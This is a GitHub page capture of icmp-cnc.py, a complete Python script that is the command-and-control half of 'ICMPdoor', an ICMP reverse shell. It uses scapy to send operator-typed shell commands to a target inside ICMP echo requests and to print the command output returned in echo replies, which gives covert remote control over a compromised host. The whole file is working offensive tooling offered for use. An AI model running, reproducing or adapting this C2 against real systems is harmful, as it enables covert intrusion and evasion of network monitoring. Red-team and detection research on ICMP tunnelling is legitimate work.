-
Notifications
You must be signed in to change notification settings - Fork 71
/
Copy pathicmp-cnc.py
52 lines (45 loc) · 1.6 KB
/
icmp-cnc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python3
#ICMPdoor (ICMP reverse shell) C2
#By krabelize | cryptsus.com
#More info: https://cryptsus.com/blog/icmp-reverse-shell.html
from scapy.all import sr,IP,ICMP,Raw,sniff
from multiprocessing import Process
import argparse
#Variables
ICMP_ID = int(13170)
TTL = int(64)
def check_scapy():
try:
from scapy.all import sr,IP,ICMP,Raw,sniff
except ImportError:
print("Install the Py3 scapy module")
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--interface', type=str, required=True, help="Listener (virtual) Network Interface (e.g. eth0)")
parser.add_argument('-d', '--destination_ip', type=str, required=True, help="Destination IP address")
args = parser.parse_args()
def sniffer():
sniff(iface=args.interface, prn=shell, filter="icmp", store="0")
def shell(pkt):
if pkt[IP].src == args.destination_ip and pkt[ICMP].type == 0 and pkt[ICMP].id == ICMP_ID and pkt[Raw].load:
icmppacket = (pkt[Raw].load).decode('utf-8', errors='ignore').replace('\n','')
print(icmppacket)
else:
pass
def main():
sniffing = Process(target=sniffer)
sniffing.start()
print("[+]ICMP C2 started!")
while True:
icmpshell = input("shell: ")
if icmpshell == 'exit':
print("[+]Stopping ICMP C2...")
sniffing.terminate()
break
elif icmpshell == '':
pass
else:
payload = (IP(dst=args.destination_ip, ttl=TTL)/ICMP(type=8,id=ICMP_ID)/Raw(load=icmpshell))
sr(payload, timeout=0, verbose=0)
sniffing.join()
if __name__ == "__main__":
main()